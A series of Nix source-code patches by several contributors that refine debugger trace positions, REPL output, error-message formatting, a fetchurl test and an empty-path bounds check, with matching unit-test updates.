| 15 --------------- 1 file changed, 15 deletions(-) diff --git a/src/libutil/error.hh b/src/libutil/error.hh index 9f9302020..4fb822843 100644 --- a/src/libutil/error.hh +++ b/src/libutil/error.hh @@ -31,15 +31,6 @@ #include #include -/* Before 4.7, gcc's std::exception uses empty throw() specifiers for - * its (virtual) destructor and what() in c++11 mode, in violation of spec - */ -#ifdef __GNUC__ -#if __GNUC__ < 4 || (__GNUC__ == 4 && __GNUC_MINOR__ < 7) -#define EXCEPTION_NEEDS_THROW_SPEC -#endif -#endif - namespace nix { @@ -147,13 +138,7 @@ public: : err(e) { } -#ifdef EXCEPTION_NEEDS_THROW_SPEC - ~BaseError() throw () { }; - const char * what() const throw () { return calcWhat().c_str(); } -#else const char * what() const noexcept override { return calcWhat().c_str(); } -#endif - const std::string & msg() const { return calcWhat(); } const ErrorInfo & info() const { calcWhat(); return err; } From 05535be03a1526061ea3a3ad25459c032e1f8f8c Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 2 Feb 2024 13:07:08 +0100 Subject: [PATCH 380/654] Fix test --- tests/functional/fetchurl.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh index 578f5a34c..5259dd60e 100644 --- a/tests/functional/fetchurl.sh +++ b/tests/functional/fetchurl.sh @@ -80,4 +80,6 @@ test -x $outPath/fetchurl.sh test -L $outPath/symlink # Make sure that *not* passing a outputHash fails. -expectStderr 100 nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' +expected=100 +if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly +expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' From e67458e5b821e0a3a6839f4637eb96ff873f64ed Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Fri, 2 Feb 2024 13:22:18 +0100 Subject: [PATCH 381/654] Better test fix --- tests/functional/fetchurl.sh | 1 + 1 file changed, 1 insertion(+) diff --git a/tests/functional/fetchurl.sh b/tests/functional/fetchurl.sh index 5259dd60e..5a05cc5e1 100644 --- a/tests/functional/fetchurl.sh +++ b/tests/functional/fetchurl.sh @@ -80,6 +80,7 @@ test -x $outPath/fetchurl.sh test -L $outPath/symlink # Make sure that *not* passing a outputHash fails. +requireDaemonNewerThan "2.20" expected=100 if [[ -v NIX_DAEMON_PACKAGE ]]; then expected=1; fi # work around the daemon not returning a 100 status correctly expectStderr $expected nix-build --expr '{ url }: builtins.derivation { name = "nix-cache-info"; system = "x86_64-linux"; builder = "builtin:fetchurl"; inherit url; outputHashMode = "flat"; }' --argstr url file://$narxz 2>&1 | grep 'must be a fixed-output derivation' From 7d7483cafce258edf405756c0dd42a34afe231b9 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 17:38:46 -0800 Subject: [PATCH 382/654] Print positions in `--debugger`, instead of pointers --- src/libcmd/repl.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7d8f9819..d7af15153 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -232,7 +232,7 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi : positions[dt.expr.getPos() ? dt.expr.getPos() : noPos]; if (pos) { - out << pos; + out << *pos; if (auto loc = pos->getCodeLines()) { out << "\n"; printCodeLines(out, "", *pos, *loc); From 016db2d10fe00baa3c72ab6b5bbb480371df711f Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 17:49:10 -0800 Subject: [PATCH 383/654] Add position information to `while evaluating the attribute` --- src/libexpr/eval.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..9fee05290 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1384,7 +1384,7 @@ void ExprSelect::eval(EvalState & state, Env & env, Value & v) state, *this, env, - state.positions[pos2], + state.positions[getPos()], "while evaluating the attribute '%1%'", showAttrPath(state, env, attrPath)) : nullptr; From 0127d54d5e86db9039e6322d482d26e66af8bd8a Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 19:14:22 -0800 Subject: [PATCH 384/654] Enter debugger more reliably in let expressions and calls --- src/libexpr/eval.cc | 31 ++++++++++++++++++++++++++++--- 1 file changed, 28 insertions(+), 3 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..df40b18b8 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -846,20 +846,20 @@ void EvalState::addErrorTrace(Error & e, const PosIdx pos, const char * s, const e.addTrace(positions[pos], hintfmt(s, s2), frame); } +template static std::unique_ptr makeDebugTraceStacker( EvalState & state, Expr & expr, Env & env, std::shared_ptr && pos, - const char * s, - const std::string & s2) + const Args & ... formatArgs) { return std::make_unique(state, DebugTrace { .pos = std::move(pos), .expr = expr, .env = env, - .hint = hintfmt(s, s2), + .hint = hintfmt(formatArgs...), .isError = false }); } @@ -1322,6 +1322,19 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) for (auto & i : attrs->attrs) env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + auto dts = state.debugRepl + ? makeDebugTraceStacker( + state, + *this, + env2, + getPos() + ? std::make_shared(state.positions[getPos()]) + : nullptr, + "while evaluating a '%1%' expression", + "let" + ) + : nullptr; + body->eval(state, env2, v); } @@ -1718,6 +1731,18 @@ void EvalState::callFunction(Value & fun, size_t nrArgs, Value * * args, Value & void ExprCall::eval(EvalState & state, Env & env, Value & v) { + auto dts = state.debugRepl + ? makeDebugTraceStacker( + state, + *this, + env, + getPos() + ? std::make_shared(state.positions[getPos()]) + : nullptr, + "while calling a function" + ) + : nullptr; + Value vFun; fun->eval(state, env, vFun); From 36dfac75601b246dc22a6a27ee793dd9ef0b8c0e Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 19:31:18 -0800 Subject: [PATCH 385/654] Expose locals from `let` expressions to the debugger --- src/libexpr/eval.cc | 13 +++++++++++++ src/libexpr/nixexpr.cc | 9 +++------ 2 files changed, 16 insertions(+), 6 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..4241dca6a 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1322,6 +1322,19 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) for (auto & i : attrs->attrs) env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + auto dts = state.debugRepl + ? makeDebugTraceStacker( + state, + *this, + env2, + getPos() + ? std::make_shared(state.positions[getPos()]) + : nullptr, + "while evaluating a '%1%' expression", + "let" + ) + : nullptr; + body->eval(state, env2, v); } diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 6fe4ba81b..492e131d0 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -409,9 +409,6 @@ void ExprCall::bindVars(EvalState & es, const std::shared_ptr & void ExprLet::bindVars(EvalState & es, const std::shared_ptr & env) { - if (es.debugRepl) - es.exprEnvs.insert(std::make_pair(this, env)); - auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); Displacement displ = 0; @@ -423,6 +420,9 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr & for (auto & i : attrs->attrs) i.second.e->bindVars(es, i.second.inherited ? env : newEnv); + if (es.debugRepl) + es.exprEnvs.insert(std::make_pair(this, newEnv)); + body->bindVars(es, newEnv); } @@ -447,9 +447,6 @@ void ExprWith::bindVars(EvalState & es, const std::shared_ptr & break; } - if (es.debugRepl) - es.exprEnvs.insert(std::make_pair(this, env)); - attrs->bindVars(es, env); auto newEnv = std::make_shared(this, env.get()); body->bindVars(es, newEnv); From 6414cd259e7f271e0e7141866cbc79da7f589c93 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 2 Feb 2024 19:58:35 -0800 Subject: [PATCH 386/654] Reduce visual clutter in the debugger --- src/libcmd/repl.cc | 15 +++++++++++++-- src/libexpr/eval.cc | 4 +--- 2 files changed, 14 insertions(+), 5 deletions(-) diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc index d7d8f9819..5b4d3f9d5 100644 --- a/src/libcmd/repl.cc +++ b/src/libcmd/repl.cc @@ -243,10 +243,21 @@ static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positi return out; } +static bool isFirstRepl = true; + void NixRepl::mainLoop() { - std::string error = ANSI_RED "error:" ANSI_NORMAL " "; - notice("Welcome to Nix " + nixVersion + ". Type :? for help.\n"); + if (isFirstRepl) { + std::string_view debuggerNotice = ""; + if (state->debugRepl) { + debuggerNotice = " debugger"; + } + notice("Nix %1%%2%\nType :? for help.", nixVersion, debuggerNotice); + } + + if (isFirstRepl) { + isFirstRepl = false; + } loadFiles(); diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 91fd3ddf8..dc2579dfa 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -821,12 +821,10 @@ void EvalState::runDebugRepl(const Error * error, const Env & env, const Expr & if (error) { - printError("%s\n\n", error->what()); + printError("%s\n", error->what()); if (trylevel > 0 && error->info().level != lvlInfo) printError("This exception occurred in a 'tryEval' call. Use " ANSI_GREEN "--ignore-try" ANSI_NORMAL " to skip these.\n"); - - printError(ANSI_BOLD "Starting REPL to allow you to inspect the current state of the evaluator.\n" ANSI_NORMAL); } auto se = getStaticEnv(expr); From ec5cc1026db61d4c43c89ffdd8a71ed62cfb842d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?S=C3=B6ren=20Tempel?= Date: Sun, 4 Feb 2024 00:47:47 +0100 Subject: [PATCH 387/654] absPath: Explicitly check if path is empty before accessing it It is entirely possible for the path to be an empty string and many unit tests actually pass it as an empty string (e.g. both_roundrip or turnsEmptyPathIntoCWD). In this case, without this patch, absPath will perform a one-byte out-of-bounds access. This was discovered while enabling the nix test suite on Alpine where we compile all software with `-D_GLIBCXX_ASSERTIONS=1`, thus resulting in a test failure on Alpine. --- src/libutil/file-system.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index cf8a6d967..9fa1f62df 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -25,7 +25,7 @@ Path absPath(PathView path, std::optional dir, bool resolveSymlinks) { std::string scratch; - if (path[0] != '/') { + if (path.empty() || path[0] != '/') { // In this case we need to call `canonPath` on a newly-created // string. We set `scratch` to that string first, and then set // `path` to `scratch`. This ensures the newly-created string From a7939a6c2aad1bec454996d553148d2ba351586c Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:16:30 -0800 Subject: [PATCH 388/654] Rename `yellowtxt` -> `magentatxt` `yellowtxt` wraps its value with `ANSI_WARNING`, but `ANSI_WARNING` has been equal to `ANSI_MAGENTA` for a long time. Now the name is updated. --- src/libstore/build/derivation-goal.cc | 6 +++--- src/libstore/build/local-derivation-goal.cc | 2 +- src/libutil/fmt.hh | 12 +++++------- 3 files changed, 9 insertions(+), 11 deletions(-) diff --git a/src/libstore/build/derivation-goal.cc b/src/libstore/build/derivation-goal.cc index 00cbf4228..454c35763 100644 --- a/src/libstore/build/derivation-goal.cc +++ b/src/libstore/build/derivation-goal.cc @@ -708,7 +708,7 @@ void DerivationGoal::tryToBuild() if (!outputLocks.lockPaths(lockFiles, "", false)) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for lock on %s", yellowtxt(showPaths(lockFiles)))); + fmt("waiting for lock on %s", magentatxt(showPaths(lockFiles)))); worker.waitForAWhile(shared_from_this()); return; } @@ -762,7 +762,7 @@ void DerivationGoal::tryToBuild() the wake-up timeout expires. */ if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a machine to build '%s'", yellowtxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a machine to build '%s'", magentatxt(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); outputLocks.unlock(); return; @@ -987,7 +987,7 @@ void DerivationGoal::buildDone() diskFull |= cleanupDecideWhetherDiskFull(); auto msg = fmt("builder for '%s' %s", - yellowtxt(worker.store.printStorePath(drvPath)), + magentatxt(worker.store.printStorePath(drvPath)), statusToString(status)); if (!logger->isVerbose() && !logTail.empty()) { diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 2ba8be7d6..ce8943efe 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -232,7 +232,7 @@ void LocalDerivationGoal::tryLocalBuild() if (!buildUser) { if (!actLock) actLock = std::make_unique(*logger, lvlWarn, actBuildWaiting, - fmt("waiting for a free build user ID for '%s'", yellowtxt(worker.store.printStorePath(drvPath)))); + fmt("waiting for a free build user ID for '%s'", magentatxt(worker.store.printStorePath(drvPath)))); worker.waitForAWhile(shared_from_this()); return; } diff --git a/src/libutil/fmt.hh b/src/libutil/fmt.hh index ac72e47fb..6430c7707 100644 --- a/src/libutil/fmt.hh +++ b/src/libutil/fmt.hh @@ -63,19 +63,17 @@ inline std::string fmt(const std::string & fs, const Args & ... args) return f.str(); } -// ----------------------------------------------------------------------------- // format function for hints in errors. same as fmt, except templated values -// are always in yellow. - +// are always in magenta. template -struct yellowtxt +struct magentatxt { - yellowtxt(const T &s) : value(s) {} + magentatxt(const T &s) : value(s) {} const T & value; }; template -std::ostream & operator<<(std::ostream & out, const yellowtxt & y) +std::ostream & operator<<(std::ostream & out, const magentatxt & y) { return out << ANSI_WARNING << y.value << ANSI_NORMAL; } @@ -114,7 +112,7 @@ public: template hintformat & operator%(const T & value) { - fmt % yellowtxt(value); + fmt % magentatxt(value); return *this; } From a7927abdc165c0ed6c55565b333fd4fadcdf3417 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:18:42 -0800 Subject: [PATCH 389/654] Catch `Error`, not `BaseError` in `ValuePrinter` `BaseError` includes `Interrupt`. We probably don't want the value printer to tell you you pressed Ctrl-C while it was working. --- src/libexpr/print.cc | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..e1cb3f0cb 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -255,7 +255,7 @@ private: output << "»"; if (options.ansiColors) output << ANSI_NORMAL; - } catch (BaseError & e) { + } catch (Error & e) { printError_(e); } } @@ -405,7 +405,7 @@ private: output << ANSI_NORMAL; } - void printError_(BaseError & e) + void printError_(Error & e) { if (options.ansiColors) output << ANSI_RED; @@ -422,7 +422,7 @@ private: if (options.force) { try { state.forceValue(v, v.determinePos(noPos)); - } catch (BaseError & e) { + } catch (Error & e) { printError_(e); return; } From c5d525cd8430f31e38128acb3b483cbf17f2f977 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:19:23 -0800 Subject: [PATCH 390/654] Print error messages but not traces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This makes output of values that include errors much cleaner. Before: ``` nix-repl> { err = builtins.throw "uh oh!"; } { err = «error: … while calling the 'throw' builtin at «string»:1:9: 1| { err = builtins.throw "uh oh!"; } | ^ error: uh oh!»; } ``` After: ``` nix-repl> { err = builtins.throw "uh oh!"; } { err = «error: uh oh!»; } ``` But if the whole expression throws an error, source locations and (if applicable) a stack trace are printed, like you'd expect: ``` nix-repl> builtins.throw "uh oh!" error: … while calling the 'throw' builtin at «string»:1:1: 1| builtins.throw "uh oh!" | ^ error: uh oh! ``` --- src/libexpr/print.cc | 2 +- tests/unit/libexpr/value/print.cc | 44 +++---------------------------- 2 files changed, 5 insertions(+), 41 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..f4b13019e 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -409,7 +409,7 @@ private: { if (options.ansiColors) output << ANSI_RED; - output << "«" << e.msg() << "»"; + output << "«error: " << filterANSIEscapes(e.info().msg.str(), true) << "»"; if (options.ansiColors) output << ANSI_NORMAL; } diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc index c4264a38d..c1de3a6a9 100644 --- a/tests/unit/libexpr/value/print.cc +++ b/tests/unit/libexpr/value/print.cc @@ -460,19 +460,7 @@ TEST_F(ValuePrintingTests, ansiColorsError) test(vError, ANSI_RED - "«" - ANSI_RED - "error:" - ANSI_NORMAL - "\n … while calling the '" - ANSI_MAGENTA - "throw" - ANSI_NORMAL - "' builtin\n\n " - ANSI_RED - "error:" - ANSI_NORMAL - " uh oh!»" + "«error: uh oh!»" ANSI_NORMAL, PrintOptions { .ansiColors = true, @@ -501,19 +489,7 @@ TEST_F(ValuePrintingTests, ansiColorsDerivationError) test(vAttrs, "{ drvPath = " ANSI_RED - "«" - ANSI_RED - "error:" - ANSI_NORMAL - "\n … while calling the '" - ANSI_MAGENTA - "throw" - ANSI_NORMAL - "' builtin\n\n " - ANSI_RED - "error:" - ANSI_NORMAL - " uh oh!»" + "«error: uh oh!»" ANSI_NORMAL "; type = " ANSI_MAGENTA @@ -527,19 +503,7 @@ TEST_F(ValuePrintingTests, ansiColorsDerivationError) test(vAttrs, ANSI_RED - "«" - ANSI_RED - "error:" - ANSI_NORMAL - "\n … while calling the '" - ANSI_MAGENTA - "throw" - ANSI_NORMAL - "' builtin\n\n " - ANSI_RED - "error:" - ANSI_NORMAL - " uh oh!»" + "«error: uh oh!»" ANSI_NORMAL, PrintOptions { .ansiColors = true, @@ -560,7 +524,7 @@ TEST_F(ValuePrintingTests, ansiColorsAssert) state.mkThunk_(v, &expr); test(v, - ANSI_RED "«" ANSI_RED "error:" ANSI_NORMAL " assertion '" ANSI_MAGENTA "false" ANSI_NORMAL "' failed»" ANSI_NORMAL, + ANSI_RED "«error: assertion 'false' failed»" ANSI_NORMAL, PrintOptions { .ansiColors = true, .force = true From 9646d62b0c3b1313565124a304ddc4057700ab13 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:21:20 -0800 Subject: [PATCH 391/654] Don't print values in magenta This fixes the opening bracket of lists/attrsets being printed in magenta, unlike the closing bracket. https://github.com/NixOS/nix/pull/9753#issuecomment-1904616088 --- src/libexpr/print.cc | 7 + src/libexpr/print.hh | 10 ++ tests/unit/libexpr/error_traces.cc | 228 ++++++++++++++--------------- 3 files changed, 131 insertions(+), 114 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..277c454d7 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -511,4 +511,11 @@ std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer) return output; } +template<> +hintformat & hintformat::operator%(const ValuePrinter & value) +{ + fmt % value; + return *this; +} + } diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index a8300264a..a542bc7b1 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -9,6 +9,7 @@ #include +#include "fmt.hh" #include "print-options.hh" namespace nix { @@ -78,4 +79,13 @@ public: }; std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer); + + +/** + * `ValuePrinter` does its own ANSI formatting, so we don't color it + * magenta. + */ +template<> +hintformat & hintformat::operator%(const ValuePrinter & value); + } diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 5fca79304..2f4c9e60d 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -105,7 +105,7 @@ namespace nix { TEST_F(ErrorTraceTest, genericClosure) { ASSERT_TRACE2("genericClosure 1", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure {}", @@ -115,22 +115,22 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = 1; }", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = true; }", TypeError, - hintfmt("expected a function but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: true; }", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ true ]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ {} ]; }", @@ -145,7 +145,7 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = [ true ]; operator = item: [{ key = ''a''; }]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); } @@ -154,12 +154,12 @@ namespace nix { TEST_F(ErrorTraceTest, replaceStrings) { ASSERT_TRACE2("replaceStrings 0 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [] 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.replaceStrings")); ASSERT_TRACE1("replaceStrings [ 0 ] [] {}", @@ -168,17 +168,17 @@ namespace nix { ASSERT_TRACE2("replaceStrings [ 1 ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"oo\" ] [ true ] \"foo\"", TypeError, - hintfmt("expected a string but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"old\" ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the third argument passed to builtins.replaceStrings")); } @@ -243,7 +243,7 @@ namespace nix { TEST_F(ErrorTraceTest, ceil) { ASSERT_TRACE2("ceil \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.ceil")); } @@ -252,7 +252,7 @@ namespace nix { TEST_F(ErrorTraceTest, floor) { ASSERT_TRACE2("floor \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.floor")); } @@ -265,7 +265,7 @@ namespace nix { TEST_F(ErrorTraceTest, getEnv) { ASSERT_TRACE2("getEnv [ ]", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.getEnv")); } @@ -286,7 +286,7 @@ namespace nix { TEST_F(ErrorTraceTest, placeholder) { ASSERT_TRACE2("placeholder []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.placeholder")); } @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("cannot coerce %s to a string: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -387,7 +387,7 @@ namespace nix { ASSERT_TRACE2("filterSource [] ./.", TypeError, - hintfmt("expected a function but found %s: %s", "a list", "[ ]"), + hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.filterSource")); // Usupported by store "dummy" @@ -412,7 +412,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrNames) { ASSERT_TRACE2("attrNames []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the argument passed to builtins.attrNames")); } @@ -421,7 +421,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrValues) { ASSERT_TRACE2("attrValues []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the argument passed to builtins.attrValues")); } @@ -430,12 +430,12 @@ namespace nix { TEST_F(ErrorTraceTest, getAttr) { ASSERT_TRACE2("getAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" {}", @@ -453,12 +453,12 @@ namespace nix { TEST_F(ErrorTraceTest, hasAttr) { ASSERT_TRACE2("hasAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), 